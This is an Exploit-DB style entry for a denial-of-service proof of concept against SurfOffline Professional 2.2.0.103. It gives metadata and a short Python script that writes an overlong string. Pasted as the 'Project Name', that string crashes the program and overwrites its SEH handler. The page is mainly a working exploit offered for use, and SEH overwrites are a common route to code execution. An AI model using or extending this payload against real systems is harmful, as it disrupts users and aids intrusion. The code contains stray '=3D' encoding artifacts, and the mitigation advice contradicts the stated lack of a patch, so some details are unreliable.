SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)

vendor:

SurfOffline Professional

by:

Chris Inzinga

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: SurfOffline Professional

Affected Version From: 2.2.0.103

Affected Version To: 2.2.0.103

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 SP1 (x86)

2019

SurfOffline Professional 2.2.0.103 – ‘Project Name’ Denial of Service (SEH)

This exploit triggers a denial of service vulnerability in SurfOffline Professional version 2.2.0.103. By providing a specially crafted payload as the 'Project Name' parameter, an attacker can cause the program to crash, overwriting the SEH (Structured Exception Handling) value.

Mitigation:

Update to a patched version of SurfOffline Professional.

Source

Exploit-DB raw data:

# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.bimesoft.com/
# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
# Version: 2.2.0.103
# Tested on: Windows 7 SP1 (x86)

# Steps to reproduce:
# 1. Generate a malicious payload via the PoC
# 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
# 4. Observe a program DOS crash, overwriting SEH=20

#!/usr/bin/python

payload =3D "A" * 382 + "B" * 4 + "C" * 4

try:
    fileCreate =3Dopen("exploit.txt","w")
    print("[x] Creating file")
    fileCreate.write(payload)
    fileCreate.close()
    print("[x] File created")
except:
    print("[!] File failed to be created")